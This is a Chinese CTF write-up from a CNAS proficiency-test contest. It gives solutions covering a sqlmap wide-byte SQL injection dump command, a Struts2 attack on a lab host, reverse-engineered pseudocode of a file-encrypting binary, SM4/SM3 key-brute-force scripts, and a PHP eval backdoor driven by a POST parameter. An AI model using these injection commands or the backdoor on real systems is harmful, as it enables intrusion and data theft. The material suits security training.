
cnas能力验证攻防比赛writeup


前言

周末打了一次cnas的比赛,最终成绩第6,第三题虚拟机没有D盘,没做出来,回来重新建了个虚拟机,一会儿就搞出来了,题目比较简单,以下是所有题目的writeup.

第一题

签到题,查看源代码,通过提示知道有一个www.zip的文件,里面是用户名和密码的字典,控制burp的爆破频率为1秒一次即可.

第二题

宽字节注入

sqlmap -u http://172.20.2.19:9002/article.php?id=1 --dbms mysql --prefix "%df%27"  -v 3  -D ctf -T secret --dump

第三题

下载文件: http://172.20.2.19:9003/myemail/file.zip

逆向分析该文件,首先该程序会在D盘根目录生成一个RSA.exe

v17 = 0i64;
v18 = 0i64;
qword_42078C(&v14, &v16);
qword_4206DC(v14, *(unsigned int *)(v12 + 4));
if ( *(_BYTE *)(v14 + 32) )
qword_4206D4(v14, 32i64);
qword_42071C(&v14);
v3 = (void (__fastcall *)(__int64 *))qword_4206BC;
qword_4206BC(&v13);
v4 = sub_403F90("D:\\RSA.exe", "wb");
if ( v4 )
{
qword_42070C(&v14);
qword_4206FC(&v14, v4, 2i64, 0i64);
v2(&v16, &v14);
qword_420774(&v14, v12 + *(_QWORD *)(v12 + 16), *(signed int *)(v12 + 4));
v3(&v14);
sub_403F98(v4);
v5 = (void (__fastcall *)(char *))qword_4206B4;
qword_4206B4(&v16);
v6 = (__int64 (__fastcall *)(char *))qword_420714;

逆向分析RSA.exe可知该程序关键的加解密函数如下

// Decompiled (IDA pseudocode) entry routine of RSA.exe. The encrypt routine
// runs on every call; the decrypt routine is only reached when the rand()
// check hits (1 in 10000), which is why the writeup's next step is to take
// control of that jump (控制函数跳转) instead of waiting for it.
int __usercall sub_4069F0@<eax>(int a1@<edi>)
{
sub_406520(); // encrypt: D:\flag\*.abcdef -> D:\flag\*.abcdef.encode (see next listing)
if ( rand() % 10000 == 1 )
sub_406790(a1); // decrypt: D:\flag\*.abcdef.encode (see the listing after)
return 0;
}

加密函数是对D:\flag\*.abcdef进行加密,并生成D:\flag\*.abcdef.encode文件

sub_408000(&Dst, "D:\\flag", 7u);
LOBYTE(v28) = 6;
v26 = 0;
v27 = 15;
LOBYTE(Memory) = 0;
sub_408000(&Memory, ".abcdef", 7u);
Src = 0;
v16 = 0;
v17 = 0;
LOBYTE(v28) = 8;
sub_404BF0(&Dst, (int)&Memory, (int)&savedregs, (int)&Src);// 文件名
sub_407C40(&v4, Src);

解密函数是对D:\flag\*.abcdef.encode进行解密

sub_408000(&Dst, "D:\\flag", 7u);
LOBYTE(v33) = 6;
v31 = 0;
v32 = 15;
LOBYTE(Memory) = 0;
sub_408000(&Memory, ".abcdef.encode", 0xEu);
Src = 0;
v21 = 0;
v22 = 0;
LOBYTE(v33) = 8;
sub_404BF0(&Dst, (int)&Memory, (int)&savedregs, (int)&Src);
sub_407C40(&v5, Src);
sub_404FE0((int)&v11, (int)&savedregs, a1, v5, v6, v7, v8, v9, v10);// 解密函数
sub_407BC0(&Src);
if ( v32 >= 0x10 )
{

控制函数跳转

控制函数返回

获得解密后的ascii码 0000666C61677B64646539313833612D333430362D343538662D613830342D3033386333366133656332357D
解密结果flag{dde9183a-3406-458f-a804-038c36a3ec25}

第四题

签到题,Struts2直接打,链接:
http://172.20.2.39:8080/showcase.action

第五题

数据库中获取密文:[167, 67, 35, 40, 2, 174, 156, 180, 14, 3, 97, 185, 54, 222, 236, 63]

根据提示,使用sm4解密,由于有100个key,使用脚本批量处理一下

# -*- coding:utf-8 -*-


"""
SM4 GM
"""
import copy

# SM4 S-box: one byte in, one byte out. Indexed by the input byte, so
# SboxTable[x] is the substitution of x. 16 entries per row, row r covers
# inputs 0x{r}0..0x{r}F.
SboxTable = [
    0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05,
    0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,
    0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62,
    0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6,
    0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8,
    0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35,
    0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87,
    0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e,
    0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1,
    0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3,
    0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f,
    0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51,
    0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8,
    0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0,
    0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84,
    0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48,
]

# System parameter FK: the four words XORed into the master key before the
# key schedule runs (see Sm4.sm4_setkey).
FK = [0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc]

# Fixed parameter CK: 32 words whose bytes follow ck[i][j] = (4*i + j) * 7 mod 256,
# packed big-endian. Generated rather than listed; CK[0] == 0x00070e15 and
# CK[31] == 0x646b7279 match the tabulated constants.
CK = [
    sum((((4 * i + j) * 7) % 256) << (8 * (3 - j)) for j in range(4))
    for i in range(32)
]

# Direction flags accepted by Sm4.sm4_set_key(); DECRYPT reverses the round keys.
ENCRYPT = 0
DECRYPT = 1


def GET_UINT32_BE(key_data):
    """Pack the first four byte values of *key_data* into one big-endian 32-bit int.

    Only indices 0..3 are read; anything beyond them is ignored.
    """
    value = 0
    for pos in range(4):
        value = (value << 8) | key_data[pos]
    return int(value)


def PUT_UINT32_BE(n):
return [int((n>>24)&0xff), int((n>>16)&0xff), int((n>>8)&0xff), int((n)&0xff)]


# 32-bit left shift: bits pushed past bit 31 are discarded.
def SHL(x, n):
    """Return ``x << n`` truncated to 32 bits."""
    return (x << n) & 0xffffffff


def ROTL(x, n):
    """Rotate the low 32 bits of *x* left by *n* positions (0 < n < 32).

    The upper part is the 32-bit-truncated left shift; the lower part is the
    bits that fell off the top, masked to 32 bits.
    """
    upper = (x << n) & 0xffffffff
    lower = (x >> (32 - n)) & 0xffffffff
    return upper | lower


def XOR(a, b):
    """Element-wise XOR of two sequences of ints, returned as a list.

    Callers pass equal-length lists (16-byte blocks, 4-word vectors).
    """
    return [left ^ right for left, right in zip(a, b)]


def sm4Sbox(idx):
    """Substitute one byte (0x00..0xFF) through the SM4 S-box.

    Args:
        idx: the input byte; used directly as an index into SboxTable.
    Returns:
        The substituted byte value.
    """
    table = SboxTable
    return table[idx]


def sm4CalciRK(ka):
    """Key-schedule transform T' used to derive each round key.

    Each byte of the 32-bit word *ka* goes through the S-box, the bytes are
    reassembled, and the linear step L'(B) = B ^ (B <<< 13) ^ (B <<< 23)
    is applied.

    Args:
        ka: a 32-bit unsigned value.
    Returns:
        The 32-bit round-key word.
    """
    substituted = [sm4Sbox(byte) for byte in PUT_UINT32_BE(ka)]
    word = GET_UINT32_BE(substituted)
    return word ^ ROTL(word, 13) ^ ROTL(word, 23)


def sm4Lt(ka):
    """Round transform T = L o tau: byte-wise S-box, then the linear mix.

    L(B) = B ^ (B <<< 2) ^ (B <<< 10) ^ (B <<< 18) ^ (B <<< 24).

    Args:
        ka: a 32-bit unsigned value.
    Returns:
        The mixed 32-bit word.
    """
    word = GET_UINT32_BE([sm4Sbox(byte) for byte in PUT_UINT32_BE(ka)])
    rotations = (ROTL(word, 2), ROTL(word, 10), ROTL(word, 18), ROTL(word, 24))
    result = word
    for rotated in rotations:
        result ^= rotated
    return result

def sm4F(x0, x1, x2, x3, rk):
    """One SM4 round function: ``x0 ^ T(x1 ^ x2 ^ x3 ^ rk)``.

    Args:
        x0, x1, x2, x3: the four 32-bit state words.
        rk: the round key for this round.
    Returns:
        The new 32-bit state word.
    """
    mixed = x1 ^ x2 ^ x3 ^ rk
    return x0 ^ sm4Lt(mixed)


class Sm4(object):
    """SM4 block cipher over lists of byte values (ints 0..255).

    Holds the 32 expanded round keys and the direction set by sm4_set_key();
    offers raw ECB and CBC processing without any padding.
    """

    def __init__(self):
        # Round keys are filled in by sm4_setkey(); until then they are zero.
        self.sk = [0] * 32
        self.mode = ENCRYPT

    def sm4_set_key(self, key_data, mode):
        """Alias of sm4_setkey() kept for callers using this spelling."""
        self.sm4_setkey(key_data, mode)

    def sm4_setkey(self, key, mode):
        """Expand the 16-byte *key* into 32 round keys in place.

        Args:
            key: 16 byte values (only indices 0..15 are read).
            mode: ENCRYPT or DECRYPT; DECRYPT stores the keys in reverse order.
        """
        master = [GET_UINT32_BE(key[off:off + 4]) for off in (0, 4, 8, 12)]
        # k grows from the 4 FK-whitened words to 36 words; sk[i] is k[i + 4].
        k = XOR(master, FK)
        for i in range(32):
            k.append(k[i] ^ sm4CalciRK(k[i + 1] ^ k[i + 2] ^ k[i + 3] ^ CK[i]))
            self.sk[i] = k[i + 4]
        self.mode = mode
        if mode == DECRYPT:
            self.sk.reverse()

    def sm4_one_round(self, sk, in_put):
        """Run the 32-round SM4 transform on one 16-byte block.

        Args:
            sk: the 32 round keys to use (already reversed for decryption).
            in_put: 16 byte values.
        Returns:
            A list of 16 byte values (the reverse transform R: X35, X34, X33, X32).
        """
        state = [GET_UINT32_BE(in_put[off:off + 4]) for off in (0, 4, 8, 12)]
        for idx in range(32):
            state.append(sm4F(state[idx], state[idx + 1], state[idx + 2], state[idx + 3], sk[idx]))
        out_put = []
        for word in reversed(state[32:36]):
            out_put.extend(PUT_UINT32_BE(word))
        return out_put

    def sm4_crypt_ecb(self, input_data):
        """ECB: process *input_data* 16 bytes at a time with the current round keys (no padding)."""
        output_data = []
        for off in range(0, len(input_data), 16):
            output_data += self.sm4_one_round(self.sk, input_data[off:off + 16])
        return output_data

    def sm4_crypt_cbc(self, iv, input_data):
        """CBC: chain blocks through *iv*; encrypts when self.mode is ENCRYPT, otherwise decrypts.

        Args:
            iv: 16 byte values used for the first block.
            input_data: byte values, a multiple of 16 long (no padding is applied).
        Returns:
            The processed byte values as a list.
        """
        output_data = []
        chain = iv[0:16]
        if self.mode == ENCRYPT:
            for off in range(0, len(input_data), 16):
                whitened = XOR(input_data[off:off + 16], chain)
                chain = self.sm4_one_round(self.sk, whitened)
                output_data += chain
        else:
            for off in range(0, len(input_data), 16):
                decrypted = self.sm4_one_round(self.sk, input_data[off:off + 16])
                output_data += XOR(decrypted, chain)
                # The next block is unwhitened with this block's ciphertext.
                chain = input_data[off:off + 16]
        return output_data


def sm4_crypt_ecb(mode, key, data):
    """One-shot ECB helper: set *key* in *mode* (ENCRYPT/DECRYPT) and process *data*."""
    engine = Sm4()
    engine.sm4_set_key(key, mode)
    return engine.sm4_crypt_ecb(data)


def sm4_crypt_cbc(mode, key, iv, data):
    """One-shot CBC helper: set *key* in *mode*, then run *data* through CBC with *iv*."""
    engine = Sm4()
    engine.sm4_set_key(key, mode)
    return engine.sm4_crypt_cbc(iv, data)


def encrypt(key, message):
    """ECB-encrypt *message* (byte values, a multiple of 16 long) under the 16-byte *key*."""
    engine = Sm4()
    engine.sm4_set_key(key, ENCRYPT)
    return engine.sm4_crypt_ecb(message)

def decrypt(key, cipher):
    """ECB-decrypt *cipher* (byte values) under the 16-byte *key*.

    Returns:
        The plaintext as a str, each byte mapped through chr().
    """
    engine = Sm4()
    engine.sm4_set_key(key, DECRYPT)
    plain_bytes = engine.sm4_crypt_ecb(cipher)
    return ''.join(chr(b) for b in plain_bytes)
# Candidate SM4 keys from the challenge hint, concatenated into one flat list
# of byte values (presumably 100 keys x 16 bytes -- the __main__ loop below
# slices it 16 at a time and tries each slice as a key).
a1=[195, 240, 101, 163, 196, 230, 26, 199, 90, 214, 164, 63, 21, 75, 63, 253, 38, 215, 63, 67, 130, 140, 20, 203, 141, 3, 234, 95, 86, 10, 114, 97, 186, 84, 115, 198, 73, 252, 192, 245, 206, 156, 153, 186, 210, 155, 190, 134, 211, 213, 143, 96, 239, 67, 56, 36, 188, 124, 237, 196, 212, 117, 90, 231, 214, 67, 157, 133, 145, 214, 251, 127, 43, 62, 173, 13, 107, 231, 41, 128, 156, 240, 150, 8, 180, 146, 88, 64, 71, 242, 75, 222, 90, 2, 38, 50, 65, 143, 71, 110, 63, 4, 205, 29, 71, 20, 10, 39, 206, 142, 85, 76, 75, 95, 3, 124, 34, 62, 42, 39, 32, 80, 80, 91, 137, 141, 196, 209, 194, 149, 129, 180, 214, 254, 128, 72, 174, 149, 242, 217, 223, 129, 207, 96, 23, 116, 64, 34, 49, 229, 65, 36, 205, 60, 89, 161, 137, 188, 97, 112, 116, 213, 174, 163, 214, 154, 44, 142, 239, 22, 134, 135, 200, 237, 10, 244, 164, 8, 34, 27, 220, 204, 10, 229, 53, 252, 212, 119, 70, 242, 102, 199, 223, 214, 34, 90, 135, 173, 125, 247, 6, 229, 242, 160, 1, 65, 219, 57, 2, 40, 10, 197, 63, 248, 178, 112, 192, 138, 181, 187, 105, 157, 23, 252, 162, 254, 214, 178, 83, 207, 47, 66, 114, 41, 233, 206, 220, 94, 2, 112, 97, 75, 200, 28, 58, 188, 245, 54, 163, 27, 113, 115, 21, 193, 34, 118, 92, 247, 188, 252, 173, 211, 219, 127, 93, 142, 177, 147, 116, 138, 77, 89, 238, 207, 115, 173, 182, 201, 29, 139, 109, 240, 155, 64, 87, 21, 2, 67, 21, 113, 67, 66, 13, 172, 45, 20, 160, 235, 115, 249, 16, 211, 238, 180, 102, 211, 81, 105, 166, 59, 248, 150, 60, 164, 51, 14, 120, 38, 136, 25, 12, 184, 167, 19, 240, 104, 4, 191, 179, 162, 202, 103, 163, 40, 97, 253, 143, 156, 200, 243, 114, 116, 6, 78, 238, 108, 28, 82, 112, 85, 241, 107, 54, 88, 37, 156, 23, 46, 10, 21, 46, 58, 229, 18, 226, 164, 138, 169, 113, 1, 8, 157, 209, 62, 180, 210, 189, 20, 217, 175, 149, 156, 156, 129, 213, 235, 201, 108, 208, 109, 210, 96, 129, 76, 126, 202, 203, 46, 184, 210, 226, 252, 29, 246, 245, 57, 160, 129, 167, 226, 171, 136, 179, 17, 102, 4, 210, 1, 193, 5, 98, 197, 212, 190, 246, 103, 147, 22, 8, 83, 88, 228, 113, 83, 102, 163, 
207, 157, 11, 42, 82, 21, 97, 31, 241, 103, 143, 217, 182, 168, 65, 253, 159, 182, 221, 41, 98, 207, 216, 252, 8, 64, 172, 53, 94, 169, 14, 81, 2, 104, 141, 210, 3, 27, 192, 31, 180, 253, 89, 88, 219, 119, 120, 40, 144, 184, 3, 210, 204, 39, 144, 66, 115, 77, 192, 247, 88, 5, 108, 134, 0, 4, 196, 108, 39, 44, 148, 64, 139, 48, 161, 142, 92, 226, 77, 15, 94, 136, 240, 43, 54, 42, 7, 241, 200, 57, 92, 213, 40, 32, 38, 89, 147, 251, 37, 115, 53, 25, 241, 144, 181, 44, 227, 216, 90, 15, 109, 249, 49, 129, 199, 190, 226, 159, 210, 137, 15, 184, 14, 123, 185, 201, 190, 14, 243, 214, 244, 179, 141, 10, 3, 43, 51, 103, 8, 239, 154, 158, 59, 224, 85, 64, 120, 46, 207, 33, 103, 215, 186, 80, 113, 232, 45, 17, 87, 163, 92, 108, 219, 45, 239, 109, 4, 93, 131, 104, 105, 11, 247, 101, 205, 168, 202, 255, 46, 237, 68, 3, 220, 35, 210, 210, 187, 64, 18, 239, 8, 84, 162, 47, 73, 240, 12, 35, 165, 146, 93, 108, 203, 242, 68, 214, 254, 97, 43, 190, 204, 100, 65, 103, 174, 249, 191, 121, 39, 233, 196, 173, 78, 119, 116, 125, 143, 117, 126, 55, 212, 173, 117, 116, 38, 126, 209, 41, 251, 39, 10, 211, 195, 124, 80, 17, 196, 79, 74, 203, 3, 246, 182, 136, 246, 192, 210, 175, 37, 108, 109, 224, 170, 46, 85, 174, 160, 48, 87, 79, 188, 17, 55, 5, 88, 17, 34, 185, 65, 215, 169, 82, 222, 91, 12, 169, 146, 207, 1, 172, 48, 27, 122, 121, 98, 182, 30, 141, 25, 196, 107, 107, 90, 112, 91, 99, 41, 217, 73, 44, 205, 189, 159, 142, 135, 153, 159, 96, 64, 60, 165, 110, 31, 244, 226, 47, 19, 115, 98, 195, 251, 194, 86, 129, 112, 25, 174, 162, 160, 38, 190, 118, 213, 168, 68, 43, 229, 213, 31, 210, 44, 105, 153, 165, 119, 141, 157, 237, 31, 35, 72, 107, 232, 2, 89, 245, 98, 119, 155, 238, 215, 49, 118, 80, 132, 152, 13, 103, 24, 200, 54, 59, 4, 185, 213, 43, 205, 114, 6, 164, 36, 44, 47, 159, 151, 104, 209, 149, 43, 65, 27, 70, 216, 181, 251, 5, 208, 142, 207, 168, 232, 215, 189, 85, 10, 11, 23, 223, 210, 184, 110, 191, 84, 67, 202, 161, 174, 227, 92, 156, 22, 222, 218, 16, 171, 107, 242, 202, 122, 45, 
50, 250, 73, 2, 186, 205, 242, 113, 78, 52, 252, 120, 92, 215, 183, 140, 64, 104, 181, 37, 37, 254, 31, 178, 61, 45, 11, 225, 97, 65, 24, 139, 34, 135, 92, 127, 210, 108, 205, 215, 79, 1, 215, 158, 126, 71, 108, 218, 206, 85, 78, 181, 0, 52, 44, 25, 57, 120, 191, 34, 17, 140, 203, 193, 77, 13, 150, 228, 60, 247, 219, 38, 253, 174, 44, 26, 20, 114, 248, 36, 79, 147, 48, 55, 39, 182, 95, 202, 72, 254, 148, 209, 45, 113, 103, 238, 9, 153, 227, 205, 85, 25, 85, 91, 85, 20, 1, 64, 146, 223, 246, 2, 177, 105, 199, 112, 248, 73, 11, 215, 140, 249, 179, 44, 209, 86, 154, 10, 210, 183, 39, 171, 39, 2, 63, 41, 120, 116, 65, 241, 133, 72, 175, 228, 1, 96, 229, 5, 79, 2, 188, 125, 24, 76, 251, 39, 200, 214, 134, 191, 11, 131, 233, 141, 79, 87, 234, 152, 174, 30, 115, 97, 109, 95, 248, 143, 214, 239, 213, 166, 92, 253, 99, 118, 98, 70, 247, 69, 183, 250, 158, 37, 228, 10, 68, 211, 64, 37, 237, 127, 231, 5, 239, 63, 209, 72, 116, 119, 77, 69, 235, 249, 72, 127, 31, 123, 118, 157, 18, 9, 41, 58, 29, 104, 5, 10, 143, 144, 11, 37, 88, 251, 36, 77, 49, 10, 116, 11, 35, 161, 104, 49, 252, 36, 242, 215, 104, 167, 150, 227, 42, 235, 122, 191, 122, 16, 166, 162, 197, 13, 109, 15, 172, 33, 51, 230, 33, 104, 250, 4, 253, 185, 218, 251, 35, 233, 4, 246, 161, 28, 112, 203, 75, 123, 217, 32, 85, 164, 242, 14, 59, 246, 191, 158, 242, 138, 82, 17, 114, 128, 35, 52, 4, 239, 162, 125, 12, 125, 129, 26, 144, 112, 200, 156, 10, 71, 97, 93, 161, 84, 26, 32, 6, 152, 17, 174, 244, 143, 80, 115, 105, 61, 80, 212, 76, 247, 191, 52, 133, 219, 6, 90, 135, 80, 160, 39, 251, 114, 10, 96, 36, 100, 240, 201, 8, 181, 39, 66, 150, 19, 26, 86, 245, 247, 93, 142, 77, 226, 141, 217, 222, 250, 101, 87, 159, 201, 145, 106, 218, 79, 11, 133, 26, 191, 233, 158, 132, 79, 157, 138, 156, 232, 144, 115, 158, 7, 17, 167, 5, 102, 0, 3, 49, 128, 229, 128, 69, 24, 62, 1, 59, 146, 12, 152, 206, 16, 242, 209, 114, 79, 238, 175, 226, 73, 116, 164, 13, 210, 134, 116, 71, 225, 58, 242, 25, 227, 120, 93, 125, 10, 64, 2, 72, 56, 
59, 38, 52, 211, 20, 142, 19, 197, 5, 151, 142, 232, 137, 186, 200, 126, 6, 216, 24, 255, 99, 73, 18, 199, 35, 88, 13, 240, 100, 84, 234, 12, 50, 104, 196, 122, 218, 132, 1, 67, 188, 116, 189, 153, 129, 255, 65, 143, 111, 186, 127, 29, 60, 203, 89, 238, 176, 91, 40, 108, 230, 241, 52, 66, 23, 233, 239, 246, 93, 86, 132, 192, 41, 2, 9, 233, 239, 35, 22, 32, 104, 248, 160, 153, 113, 186, 213, 195, 224, 211, 119, 170, 130, 203, 0, 24, 255, 30, 176, 164, 123, 55, 33, 206, 249, 122, 2, 155, 220, 237, 152, 11, 9, 152, 172, 171, 77, 139, 70, 206, 197, 153, 127, 58, 87, 188, 160, 138, 43, 123, 169, 2, 214, 96, 229, 166, 153, 61, 83, 121, 238, 130, 243, 63, 237, 45, 208, 53, 96, 133, 6, 135, 207, 95, 79, 131, 38, 59, 233, 91, 87, 181, 90, 32, 2, 216, 208, 68, 188, 15, 160, 126, 182, 193, 123, 178, 252, 57, 62, 129, 81, 42, 204, 175, 211, 17, 197, 18, 240, 41, 82, 244, 201, 190, 87, 189, 234, 56, 26, 239, 55, 64, 82, 21, 158, 121, 210, 80, 58, 177, 122, 134, 151, 29, 225, 173, 37, 112, 85, 67, 62, 102, 73, 61, 69, 22, 209, 254, 137, 65, 86, 120, 9, 222, 91, 48, 24, 138, 135, 152, 96, 246, 126, 175, 39, 102, 197, 41, 236, 130, 159, 56, 198, 251, 69, 166, 172, 156, 240, 149, 204, 162, 211, 150, 76, 79, 158, 38, 153, 55, 20, 94, 62, 121, 218, 55, 183, 180, 45, 249]
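if __name__ == "__main__":
    # Reference vector shipped with the original SM4 sample (not used by the
    # solve, kept as a sanity check for encrypt()/decrypt()):
    #   key     = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
    #   message = [115, 109, 52, 32, 116, 101, 115, 116, 48, 49, 50, 51, 52, 53, 54, 55]
    #   cipher  = [5, 28, 162, 46, 247, 9, 152, 32, 180, 19, 86, 178, 8, 103, 31, 167]

    # The challenge ciphertext pulled from the database: one 16-byte block.
    cipher = [167, 67, 35, 40, 2, 174, 156, 180, 14, 3, 97, 185, 54, 222, 236, 63]
    # ECB has no padding, so the input must be whole blocks; raise rather than
    # assert so the check survives `python -O`.
    if len(cipher) % 16 != 0:
        raise ValueError("ciphertext length must be a multiple of 16 bytes")

    # Try each 16-byte candidate key from a1 in turn and print the ECB
    # decryption; the right key is the one whose output is readable text.
    # print(...) with a single argument works under both Python 2 and 3.
    for off in range(0, len(a1), 16):
        print(decrypt(a1[off:off + 16], cipher))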

获得的明文为SM4_0c62148892ee
使用sm3计算hash

#coding:utf-8
#杂凑算法,非对称加密
import struct

# Initial chaining value of SM3 as eight 32-bit words, most significant first.
IV = [
    int(word, 16)
    for word in "7380166f 4914b2b9 172442d7 da8a0600 a96f30bc 163138aa e38dee4d b0fb0e4e".split()
]

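def out_hex(list1):
    """Print the words of *list1* as zero-padded 8-digit hex, space-separated, on one line.

    Written with a single-argument print() so it runs under Python 2 and 3
    (the original used the Python 2 print statement).
    """
    print(" ".join("%08x" % word for word in list1))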

def rotate_left(a, k):
    """Rotate the low 32 bits of *a* left by *k* positions; *k* is reduced mod 32.

    Bits of *a* above bit 31 are discarded, so the result is always < 2**32.
    """
    shift = k % 32
    high = (a << shift) & 0xFFFFFFFF
    low = (a & 0xFFFFFFFF) >> (32 - shift)
    return high | low

# SM3 round constants T_j: 0x79cc4519 for rounds 0..15, 0x7a879d8a for rounds 16..63.
T_j = [0x79cc4519] * 16 + [0x7a879d8a] * 48

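def FF_j(X, Y, Z, j):
    """SM3 Boolean function FF_j: XOR for rounds 0..15, majority for rounds 16..63.

    Args:
        X, Y, Z: 32-bit words.
        j: the round index, 0..63.
    Raises:
        ValueError: if *j* is outside 0..63 (the original left ``ret`` unbound
        and failed with UnboundLocalError instead).
    """
    if 0 <= j < 16:
        return X ^ Y ^ Z
    if 16 <= j < 64:
        return (X & Y) | (X & Z) | (Y & Z)
    raise ValueError("round index j must be in 0..63, got %r" % (j,))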

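def GG_j(X, Y, Z, j):
    """SM3 Boolean function GG_j: XOR for rounds 0..15, (X & Y) | (~X & Z) for rounds 16..63.

    ``~X`` is negative in Python but ``& Z`` with a non-negative Z keeps the
    result non-negative, so no explicit 32-bit mask is needed here.

    Args:
        X, Y, Z: 32-bit words.
        j: the round index, 0..63.
    Raises:
        ValueError: if *j* is outside 0..63 (the original left ``ret`` unbound
        and failed with UnboundLocalError instead).
    """
    if 0 <= j < 16:
        return X ^ Y ^ Z
    if 16 <= j < 64:
        return (X & Y) | ((~X) & Z)
    raise ValueError("round index j must be in 0..63, got %r" % (j,))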

def P_0(X):
    """SM3 permutation P0: X ^ (X <<< 9) ^ (X <<< 17)."""
    result = X
    for shift in (9, 17):
        result ^= rotate_left(X, shift)
    return result

def P_1(X):
    """SM3 permutation P1 (message expansion): X ^ (X <<< 15) ^ (X <<< 23)."""
    result = X
    for shift in (15, 23):
        result ^= rotate_left(X, shift)
    return result

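def CF(V_i, B_i):
    """SM3 compression function: absorb one 64-byte block *B_i* into the chaining value *V_i*.

    Args:
        V_i: the eight 32-bit words A..H of the current chaining value.
        B_i: the 64-byte message block (Python 2 str or Python 3 bytes); only
            the first 64 bytes are read.
    Returns:
        The next chaining value as a list of eight 32-bit words.

    The original carried leftover debug code (unused ``str1`` strings and
    string-literal "comments" inside the loop); that is dropped here.
    """
    # Message expansion: W[0..15] straight from the block, W[16..67] derived,
    # W'[j] = W[j] ^ W[j + 4].
    W = list(struct.unpack(">16I", B_i[:64]))
    for j in range(16, 68):
        W.append(P_1(W[j - 16] ^ W[j - 9] ^ rotate_left(W[j - 3], 15))
                 ^ rotate_left(W[j - 13], 7) ^ W[j - 6])
    W_1 = [W[j] ^ W[j + 4] for j in range(64)]

    A, B, C, D, E, F, G, H = V_i
    for j in range(64):
        SS1 = rotate_left((rotate_left(A, 12) + E + rotate_left(T_j[j], j)) & 0xFFFFFFFF, 7)
        SS2 = SS1 ^ rotate_left(A, 12)
        TT1 = (FF_j(A, B, C, j) + D + SS2 + W_1[j]) & 0xFFFFFFFF
        TT2 = (GG_j(E, F, G, j) + H + SS1 + W[j]) & 0xFFFFFFFF
        # Register rotation. Every freshly computed word is already reduced
        # mod 2**32 (TT1/TT2 are masked, rotate_left masks, P_0 XORs masked
        # words), so the per-round re-masking of the original is not needed.
        A, B, C, D = TT1, A, rotate_left(B, 9), C
        E, F, G, H = P_0(TT2), E, rotate_left(F, 19), G

    # Davies-Meyer style feed-forward with the incoming chaining value.
    return [word ^ prev for word, prev in zip((A, B, C, D, E, F, G, H), V_i)]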

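def hash_msg(msg):
    """Compute the SM3 digest of *msg* and return it as eight 32-bit words.

    Args:
        msg: the message, as bytes or as text (text is encoded as UTF-8).
    Returns:
        A list of eight 32-bit words (feed out_hex() to print it).

    Padding follows the SM3 rule: append 0x80, then zero bytes until the
    length is 56 mod 64, then the 64-bit big-endian bit length. The original
    only emitted zeros when ``len(msg) % 64 < 56``, so a message whose last
    block had 56..63 bytes was padded wrongly and its trailing block was
    silently dropped by the ``len(msg) / 64`` integer division.
    """
    if not isinstance(msg, bytes):
        msg = msg.encode("utf-8")
    bit_length = len(msg) * 8
    # Zero bytes needed so the padded data ends at offset 56 mod 64, leaving
    # exactly eight bytes for the length field.
    zero_count = (56 - (len(msg) + 1)) % 64
    padded = msg + b"\x80" + b"\x00" * zero_count + struct.pack(">Q", bit_length)

    V = IV
    for off in range(0, len(padded), 64):
        V = CF(V, padded[off:off + 64])
    return V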

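# Hash the SM4 plaintext recovered in the previous step and print the digest
# as eight hex words. The original printed the literal "abc" (a leftover of
# the reference test) instead of the message actually hashed, and used the
# Python 2 print statement; single-argument print() runs on both versions.
msg = "SM4_0c62148892ee"
print(msg)
y = hash_msg(msg)
print("result:")
out_hex(y)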

第六题

下载源码,后门文件如下

<?php
// The backdoor the writeup refers to: the /e modifier makes preg_replace()
// evaluate its replacement string as PHP, and str_rot13('riny') decodes to
// "eval", so whatever arrives in the b4dboy POST parameter is executed.
// /e was deprecated in PHP 5.5 and removed in 7.0; any preg_replace() with
// an /e pattern in a code audit deserves the same scrutiny as a direct eval.
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny')."($b4dboy)", 'add'); ?>

phpinfo查了一下可执行函数都被禁掉了,通过file_get_contents('/flag')可以获得flag

第七题

